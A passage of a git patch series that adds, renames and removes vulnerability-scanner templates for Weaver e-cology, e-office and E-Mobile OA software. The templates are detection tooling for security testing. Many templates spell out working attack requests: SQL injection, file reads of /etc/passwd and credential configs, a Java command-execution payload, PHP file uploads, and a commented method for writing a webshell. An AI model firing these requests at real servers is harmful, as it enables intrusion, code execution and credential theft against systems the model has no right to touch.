info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From edd142daebb5d8297b85d9ade8b7c57550f3aa72 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 13 Sep 2023 16:52:00 +0530 Subject: [PATCH 0338/1090] completed assigned templates --- http/cnvd/2021/CNVD-2021-33202.yaml | 36 +++++++++ .../2022/CNVD-2022-43245.yaml} | 28 ++++--- .../weaver/weaver-checkserver-sqli.yaml | 30 +++++++ .../weaver/weaver-e-cology-loginsso-sqli.yaml | 38 --------- ...orportalthumbnail-arbitrary-file-read.yaml | 32 -------- ...t-do-rce.yaml => weaver-e-mobile-rce.yaml} | 24 +++--- .../weaver-e-office-group-xml-sqli.yaml | 34 -------- ...ile-upload-save-arbitrary-file-upload.yaml | 51 ------------ ...eaver-e-office-mysql-config-info-leak.yaml | 30 ------- ...fice-officeserver-arbitrary-file-read.yaml | 31 ------- ...0-office-server-arbitrary-file-upload.yaml | 80 ------------------- ...signaturedownload-arbitrary-file-read.yaml | 36 --------- ...gy-oa-plugin-checkserver-setting-sqli.yaml | 29 ------- .../weaver/weaver-group-xml-sqli.yaml | 44 ++++++++++ ...d3.yaml => weaver-jquery-file-upload.yaml} | 32 ++++---- ... => weaver-lazyuploadify-file-upload.yaml} | 32 ++++---- ...nkey.yaml => weaver-login-sessionkey.yaml} | 19 ++--- .../weaver/weaver-mysql-config-info-leak.yaml | 28 +++++++ .../weaver-office-server-file-upload.yaml | 59 ++++++++++++++ .../weaver/weaver-officeserver-lfi.yaml | 33 ++++++++ .../weaver/weaver-signaturedownload-lfi.yaml | 40 ++++++++++ .../weaver-sptmforportalthumbnail-lfi.yaml | 39 +++++++++ ...yaml => weaver-uploadify-file-upload.yaml} | 32 ++++---- ...> weaver-uploadoperation-file-upload.yaml} | 32 ++++---- ...uth.yaml => weaver-userselect-unauth.yaml} | 26 +++--- 25 files changed, 421 insertions(+), 474 deletions(-) create mode 100755 http/cnvd/2021/CNVD-2021-33202.yaml rename http/{vulnerabilities/weaver/weaver-e-office-xmlrpcservlet-arbitrary-file-read.yaml => cnvd/2022/CNVD-2022-43245.yaml} (52%) create mode 100644 http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml delete mode 100755 http/vulnerabilities/weaver/weaver-e-cology-loginsso-sqli.yaml delete mode 100755 http/vulnerabilities/weaver/weaver-e-cology-sptmforportalthumbnail-arbitrary-file-read.yaml rename http/vulnerabilities/weaver/{weaver-e-mobile-client-do-rce.yaml => weaver-e-mobile-rce.yaml} (64%) delete mode 100755 http/vulnerabilities/weaver/weaver-e-office-group-xml-sqli.yaml delete mode 100755 http/vulnerabilities/weaver/weaver-e-office-mobile-upload-save-arbitrary-file-upload.yaml delete mode 100644 http/vulnerabilities/weaver/weaver-e-office-mysql-config-info-leak.yaml delete mode 100755 http/vulnerabilities/weaver/weaver-e-office-officeserver-arbitrary-file-read.yaml delete mode 100755 http/vulnerabilities/weaver/weaver-e-office-v10-office-server-arbitrary-file-upload.yaml delete mode 100755 http/vulnerabilities/weaver/weaver-e-weaver-signaturedownload-arbitrary-file-read.yaml delete mode 100644 http/vulnerabilities/weaver/weaver-ecology-oa-plugin-checkserver-setting-sqli.yaml create mode 100755 http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml rename http/vulnerabilities/weaver/{weaver-e-office-uploadify-arbitrary-file-upload3.yaml => weaver-jquery-file-upload.yaml} (56%) rename http/vulnerabilities/weaver/{weaver-e-office-uploadify-arbitrary-file-upload.yaml => weaver-lazyuploadify-file-upload.yaml} (63%) rename http/vulnerabilities/weaver/{weaver-e-office-login-quick-seesionkey.yaml => weaver-login-sessionkey.yaml} (56%) create mode 100644 http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml create mode 100755 http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml create mode 100755 http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml create mode 100755 http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml create mode 100755 http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml rename http/vulnerabilities/weaver/{weaver-e-office-uploadify-arbitrary-file-upload2.yaml => weaver-uploadify-file-upload.yaml} (56%) rename http/vulnerabilities/weaver/{weaver-e-cology-uploadoperation-arbitrary-file-upload.yaml => weaver-uploadoperation-file-upload.yaml} (65%) rename http/vulnerabilities/weaver/{weaver-e-office-userselect-unauth.yaml => weaver-userselect-unauth.yaml} (53%) diff --git a/http/cnvd/2021/CNVD-2021-33202.yaml b/http/cnvd/2021/CNVD-2021-33202.yaml new file mode 100755 index 0000000000..2dbe555ee6 --- /dev/null +++ b/http/cnvd/2021/CNVD-2021-33202.yaml @@ -0,0 +1,36 @@ +id: CNVD-2021-33202 + +info: + name: OA E-Cology LoginSSO.jsp - SQL Injection + author: SleepingBag945 + severity: high + description: | + e-cology is an OA office system specially produced for large and medium-sized enterprises. It supports simultaneous office work on PC, mobile and WeChat terminals. There is a SQL injection vulnerability in Panwei e-cology. An attacker could exploit this vulnerability to obtain sensitive information. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.md + - https://www.cnblogs.com/0day-li/p/14637680.html + metadata: + max-request: 1 + verified: true + fofa-query: app="泛微-协同办公OA" + tags: cnvd,cnvd2021,e-cology,sqli + +variables: + num: "999999999" + +http: + - raw: + - | + GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5({{num}})%20as%20id%20from%20HrmResourceManager HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5(num)}}' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-office-xmlrpcservlet-arbitrary-file-read.yaml b/http/cnvd/2022/CNVD-2022-43245.yaml similarity index 52% rename from http/vulnerabilities/weaver/weaver-e-office-xmlrpcservlet-arbitrary-file-read.yaml rename to http/cnvd/2022/CNVD-2022-43245.yaml index 9e9c0caefd..d2288c9132 100755 --- a/http/vulnerabilities/weaver/weaver-e-office-xmlrpcservlet-arbitrary-file-read.yaml +++ b/http/cnvd/2022/CNVD-2022-43245.yaml @@ -1,33 +1,41 @@ -id: weaver-e-office-xmlrpcservlet-arbitrary-file-read +id: CNVD-2022-43245 info: - name: weaver-e-office-xmlrpcservlet-arbitrary-file-read + name: Weaver OA XmlRpcServlet - Arbitary File Read author: SleepingBag945 severity: high - description: 通过漏洞攻击者可以获取敏感信息 - tags: weaver,e-office,oa,sqli + description: | + e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information. + metadata: + max-request: 1 + fofa-query: app="泛微-协同办公OA" + verified: true + tags: cnvd,cnvd2022,weaver,e-office,oa,lfi http: - raw: - | POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* Content-Type: application/xml - Accept-Encoding: gzip <?xml version="1.0" encoding="UTF-8"?><methodCall> <methodName>WorkflowService.getAttachment</methodName> <params><param><value><string>/etc/passwd</string> </value></param></params></methodCall> - matchers-condition: and matchers: - type: word - words: + part: body + words : - "<methodResponse><params><param><value><base64>" + + - type: word + part: header + words : + - "text/xml" + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml b/http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml new file mode 100644 index 0000000000..7df4502683 --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml @@ -0,0 +1,30 @@ +id: weaver-checkserver-sqli + +info: + name: Ecology OA CheckServer - SQL Injection + author: SleepingBag945 + severity: high + description: | + Ecology OA system improperly filters incoming data from users, resulting in a SQL injection vulnerability. Remote and unauthenticated attackers can use this vulnerability to conduct SQL injection attacks and steal sensitive database information. + reference: + - https://stack.chaitin.com/techblog/detail?id=81 + - https://github.com/lal0ne/vulnerability/blob/main/%E6%B3%9B%E5%BE%AE/E-Cology/CheckServer/README.md + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/weaver-ecology-oa-plugin-checkserver-setting-sqli.yaml + metadata: + max-request: 1 + fofa-query: app="泛微-协同办公OA" + verified: true + tags: weaver,ecology,sqli + +http: + - method: GET + path: + - "{{BaseURL}}/mobile/plugin/CheckServer.jsp?type=mobileSetting" + + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "contains(header, 'application/json')" + - "contains(body, 'system error') && !contains(body, 'securityIntercept')" + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-cology-loginsso-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-cology-loginsso-sqli.yaml deleted file mode 100755 index 0b3991ae4e..0000000000 --- a/http/vulnerabilities/weaver/weaver-e-cology-loginsso-sqli.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: weaver-e-cology-loginsso-sqli - -info: - name: weaver-e-cology-loginsso-sqli - author: SleepingBag945 - severity: high - description: 泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等。 泛微e-cology存在SQL注入漏洞。攻击者可利用该漏洞获取敏感信息。 - reference: - - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.html - tags: ecology,weaver,oa,sqli - -http: - - raw: - - | - GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(212943773)%20as%20id%20from%20HrmResourceManager HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "db66c43e263be5e8c249b006b1c80792" - - type: word - negative: true - part: header - - "https://www.drupal.org" - - type: status - status: - - 200 - -# Enhanced by md on 2022/10/31 -# CNVD-2021-33202 -# 蜜罐诱捕器。。 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-cology-sptmforportalthumbnail-arbitrary-file-read.yaml b/http/vulnerabilities/weaver/weaver-e-cology-sptmforportalthumbnail-arbitrary-file-read.yaml deleted file mode 100755 index 1a925b5a39..0000000000 --- a/http/vulnerabilities/weaver/weaver-e-cology-sptmforportalthumbnail-arbitrary-file-read.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: weaver-e-cology-sptmforportalthumbnail-arbitrary-file-read - -info: - name: weaver-e-cology-sptmforportalthumbnail-arbitrary-file-read - author: SleepingBag945 - severity: medium - description: SptmForPortalThumbnail.jsp可控的preview参数未进行过滤操作,直接拼接上web根目录进行文件下载 - reference: - - http://124.223.89.192/archives/e-cology8-14 - tags: weaver,e-cology,oa - -http: - - raw: - - | - GET /portal/SptmForPortalThumbnail.jsp?preview=portal/SptmForPortalThumbnail.jsp HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - - matchers-condition: and - matchers: - - type: word - words: - - "weaver.general.BaseBean" - - type: word - words: - - "request.getParameter" - - type: status - status: - - 200 diff --git a/http/vulnerabilities/weaver/weaver-e-mobile-client-do-rce.yaml b/http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml similarity index 64% rename from http/vulnerabilities/weaver/weaver-e-mobile-client-do-rce.yaml rename to http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml index 4219592256..1e63c77915 100644 --- a/http/vulnerabilities/weaver/weaver-e-mobile-client-do-rce.yaml +++ b/http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml @@ -1,13 +1,19 @@ -id: weaver-e-mobile-client-do-rce +id: weaver-e-mobile-rce info: - name: weaver-e-mobile-client-do-rce + name: Weaver E-mobile client.do - Remote Code Execution author: SleepingBag945 severity: critical - description: 泛微E-Mobile 6.0远程命令执行漏洞 + description: | + E-Mobile 6.0 has a command execution vulnerability. It has now been confirmed that this vulnerability can be exploited by an attacker. In some cases, user input may be passed directly to the command execution function of the underlying operating system. An attacker can insert special characters or Command sequence to trick the application into executing it as a valid command, thus gaining command execution permissions from the server. reference: - https://mp.weixin.qq.com/s/z-WN2_MTxdk3z4LvchXkXw - tags: eBridge,weaver,oa,read + - https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/%E6%B3%9B%E5%BE%AE%20E-Mobile%206.0%20%E5%AD%98%E5%9C%A8%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + shodan-query: http.html:"E-Mobile " + verified: true + tags: e-mobile,rce,weaver http: - raw: @@ -18,7 +24,6 @@ http: Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate - Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}} ------WebKitFormBoundary{{randstr}} @@ -31,13 +36,10 @@ http: 1';CREATE ALIAS if not exists MzSNqKsZTagmf AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass("com.caucho.server.dispatch.ServletInvocation").getMet','hod("getContextRequest").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField("_response");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod("getWriter");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter("\\A");writer.write(scan','ner.hasNext()?sca','nner.next():"");}');CALL MzSNqKsZTagmf('ipconfig');-- ------WebKitFormBoundary{{randstr}}-- - - req-condition: true matchers-condition: and matchers: - type: dsl dsl: - - status_code_1 == 200 && contains(body_1,'Windows IP') - condition: and - - + - status_code == 200 + - contains(body,'Windows IP Configuration') + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-office-group-xml-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-office-group-xml-sqli.yaml deleted file mode 100755 index 01210aab71..0000000000 --- a/http/vulnerabilities/weaver/weaver-e-office-group-xml-sqli.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: weaver-oa-e-office-group-xml-sqli - -info: - name: weaver-oa e-office group_xml sqli - author: SleepingBag945 - severity: critical - description: 泛微OA E-Office group_xml.php SQL注入漏洞,可写shell - reference: - - http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20group_xml.php%20SQL注入漏洞.html - tags: weaver,e-office,oa,sqli - -http: - - raw: - - | - GET /inc/group_user_list/group_xml.php?par=W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgcGhwaW5mbygpPz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290L3Z1bG50ZXN0LnBocCdd HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - - | - GET /vulntest.php HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - words: - - "phpinfo" - - type: status - status: - - 200 - -# 可构造exp写入shell -# [group]:[1]|[groupid]:[1 union select '<?php phpinfo()?>',2,3,4,5,6,7,8 into outfile '../webroot/vulntest.php'] -# /inc/group_user_list/group_xml.php?par=W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgcGhwaW5mbygpPz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290L3Z1bG50ZXN0LnBocCdd diff --git a/http/vulnerabilities/weaver/weaver-e-office-mobile-upload-save-arbitrary-file-upload.yaml b/http/vulnerabilities/weaver/weaver-e-office-mobile-upload-save-arbitrary-file-upload.yaml deleted file mode 100755 index 8a4abef63a..0000000000 --- a/http/vulnerabilities/weaver/weaver-e-office-mobile-upload-save-arbitrary-file-upload.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: weaver-e-office-mobile-upload-save-arbitrary-file-upload - -info: - name: weaver-e-office-mobile-upload-save-arbitrary-file-upload - author: SleepingBag945 - severity: critical - description: 泛微e-office存在文件上传漏洞,攻击者可利用该漏洞获取服务器控制权。 - reference: - - https://forum.butian.net/share/1791 - tags: weaver,e-office,oa - -http: - - raw: - - | - POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynejqegqr - Accept-Encoding: gzip - - ------WebKitFormBoundarynejqegqr - Content-Disposition: form-data; name="upload_quwan"; filename="{{randstr_1}}.php." - Content-Type: application/octet-stream - - <?php echo "{{randstr_2}}"; unlink(__FILE__); ?> - ------WebKitFormBoundarynejqegqr-- - - - | - GET /attachment/{{attachmentID}}/{{randstr_1}}.php HTTP/1.1 - Host: 61.184.73.157:8082 - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - extractors: - - type: regex - name: attachmentID - internal: true - regex: - - "[0-9]{10}" - - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - "status_code_1 == 200 && contains(body_1,'[1')" - - "contains(body_2, '{{randstr_2}}') && status_code_2 == 200" - condition: and diff --git a/http/vulnerabilities/weaver/weaver-e-office-mysql-config-info-leak.yaml b/http/vulnerabilities/weaver/weaver-e-office-mysql-config-info-leak.yaml deleted file mode 100644 index 2c1ea33d1a..0000000000 --- a/http/vulnerabilities/weaver/weaver-e-office-mysql-config-info-leak.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: weaver-oa-e-office-mysql-config-info-leak - -info: - name: weaver-oa e-office mysql_config.ini info-leak - author: SleepingBag945 - severity: medium - description: 泛微 E-Office mysql_config.ini文件可直接访问,泄漏数据库账号密码等信息 - reference: - - http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20mysql_config.ini%20数据库信息泄漏漏洞.html - tags: weaver,e-office,oa,info - -http: - - raw: - - | - GET /mysql_config.ini HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - - raw: - - | - GET /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini HTTP/1.1 - Host: {{Hostname}} - - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_1 == 200 && contains(body_1, "dataurl") && contains(body_1,"datapassword") && contains(body_1, "datauser")' - - 'status_code_2 == 200 && contains(body_2,"sip") && contains(body_2,"sdbuser") && contains(body_2,"sdbpassword")' - condition: or \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-office-officeserver-arbitrary-file-read.yaml b/http/vulnerabilities/weaver/weaver-e-office-officeserver-arbitrary-file-read.yaml deleted file mode 100755 index b4ac6e6d68..0000000000 --- a/http/vulnerabilities/weaver/weaver-e-office-officeserver-arbitrary-file-read.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: weaver-oa-e-office-officeserver-arbitrary-file-read - -info: - name: weaver-oa e-office officeserver arbitrary file read - author: SleepingBag945 - severity: high - description: 泛微OA E-Office officeserver.php 任意文件读取漏洞 - reference: - - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/WeaverEOfficeController.java - tags: weaver,e-office,oa - -http: - - raw: - - | - GET /iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - matchers-condition: and - matchers: - - type: word - words: - - "datapassword" - - type: word - words: - - "DBSTEP" - - type: status - status: - - 200 - -# Enhanced by cs on 2022/07/05 diff --git a/http/vulnerabilities/weaver/weaver-e-office-v10-office-server-arbitrary-file-upload.yaml b/http/vulnerabilities/weaver/weaver-e-office-v10-office-server-arbitrary-file-upload.yaml deleted file mode 100755 index c918f0b76d..0000000000 --- a/http/vulnerabilities/weaver/weaver-e-office-v10-office-server-arbitrary-file-upload.yaml +++ /dev/null @@ -1,80 +0,0 @@ -id: weaver-oa-e-office-v10-office-server-arbitrary-file-upload - -info: - name: weaver-oa e-office-v10 OfficeServer.php arbitrary file upload - author: SleepingBag945 - severity: critical - description: 泛微OA E-Office OfficeServer.php 任意文件上传漏洞 - reference: - - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/WeaverEOfficeController.java - - https://github.com/Phuong39/2022-HW-POC/blob/main/泛微%20EOffice10%20前台%20GETSHELL.md - - http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20OfficeServer.php%20任意文件上传漏洞.html - tags: weaver,e-office,oa,sqli - -http: - - raw: - - | - POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 - Cache-Control: max-age=0 - Connection: close - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLpoiBFy4ANA8daew - Upgrade-Insecure-Requests: 1 - - ------WebKitFormBoundaryLpoiBFy4ANA8daew - Content-Disposition: form-data;name="FileData";filename="teest.php" - Content-Type: application/octet-stream - - <?php - phpinfo(); - ?> - - ------WebKitFormBoundaryLpoiBFy4ANA8daew - Content-Disposition: form-data;name="FormData" - - {'USERNAME':'admin','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'teest.php'} - ------WebKitFormBoundaryLpoiBFy4ANA8daew-- - - - raw: - - | - GET /eoffice10/server/public/iWebOffice2015/Document/teest.php - Host: {{Hostname}} - - - matchers-condition: and - matchers: - - type: word - words: - - "phpinfo" - - type: status - status: - - 200 - - -# shell http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/Document/test.php -# POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1 -# Host: XXXXXXXX:8010 -# Content-Length: 378 -# Cache-Control: max-age=0 -# Upgrade-Insecure-Requests: 1 -# Origin: null -# Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs -# User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like -# Gecko) Chrome/91.0.4472.77 Safari/537.36 -# Accept: -# text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/ -# *;q=0.8,application/signed-exchange;v=b3;q=0.9 -# Accept-Encoding: gzip, deflate -# Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 -# Connection: close -# ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs -# Content-Disposition: form-data; name="FileData"; filename="1.jpg" -# Content-Type: image/jpeg -# <?php echo md5(1);?> -# ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs -# Content-Disposition: form-data; name="FormData" -# {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'} -# ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs-- \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-weaver-signaturedownload-arbitrary-file-read.yaml b/http/vulnerabilities/weaver/weaver-e-weaver-signaturedownload-arbitrary-file-read.yaml deleted file mode 100755 index dd35bdd138..0000000000 --- a/http/vulnerabilities/weaver/weaver-e-weaver-signaturedownload-arbitrary-file-read.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: weaver-e-weaver-signaturedownload-arbitrary-file-read - -info: - name: weaver-e-weaver-signaturedownload-arbitrary-file-read - author: SleepingBag945 - severity: high - description: 泛微OA E-Weaver SignatureDownLoad接口存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器任意文件 - reference: - - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Weaver%20SignatureDownLoad%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html - tags: ecology,weaver,oa,sqli - -http: - - raw: - - | - GET /weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27 HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "DriverClasses" - - type: word - part: body - words: - - "ecology.password" - - type: status - status: - - 200 - -# Enhanced by md on 2022/10/31 diff --git a/http/vulnerabilities/weaver/weaver-ecology-oa-plugin-checkserver-setting-sqli.yaml b/http/vulnerabilities/weaver/weaver-ecology-oa-plugin-checkserver-setting-sqli.yaml deleted file mode 100644 index 267ffa6e06..0000000000 --- a/http/vulnerabilities/weaver/weaver-ecology-oa-plugin-checkserver-setting-sqli.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: weaver-ecology-oa-plugin-checkserver-setting-sqli - -info: - name: 泛微 Ecology OA CheckServer SQL 注入漏洞 - author: SleepingBag945 - severity: high - description: 泛微 Ecology OA 系统由于对用户传入的数据过滤处理不当,导致存在 SQL 注入漏洞,远程且未经过身份认证的攻击者可利用此漏洞进行 SQL 注入攻击,从而可窃取数据库敏感信息。 - tags: weaver,ecology - -http: - - raw: - - | - GET /mobile/plugin/CheckServer.jsp?type=mobileSetting HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: application/x-www-form-urlencoded - Accept-Encoding: gzip - - matchers: - - type: dsl - dsl: - - status_code == 200 - - '!contains(header,"securityIntercept")' - - 'contains(header,"application/json")' - - contains(body,"\"error\":\"system error\"") - condition: and - - -# http://wiki.peiqi.tech/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html diff --git a/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml new file mode 100755 index 0000000000..37c185a222 --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml @@ -0,0 +1,44 @@ +id: weaver-group-xml-sqli + +info: + name: OA E-Office group_xml.php - SQL Injection + author: SleepingBag945 + severity: critical + description: | + There is a SQL injection vulnerability in the Panwei OA E-Office group_xml.php file. Through the vulnerability, an attacker can write to the Webshell file to obtain server permissions. + reference: + - http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20group_xml.php%20SQL注入漏洞.html + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Office%20group_xml.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + metadata: + 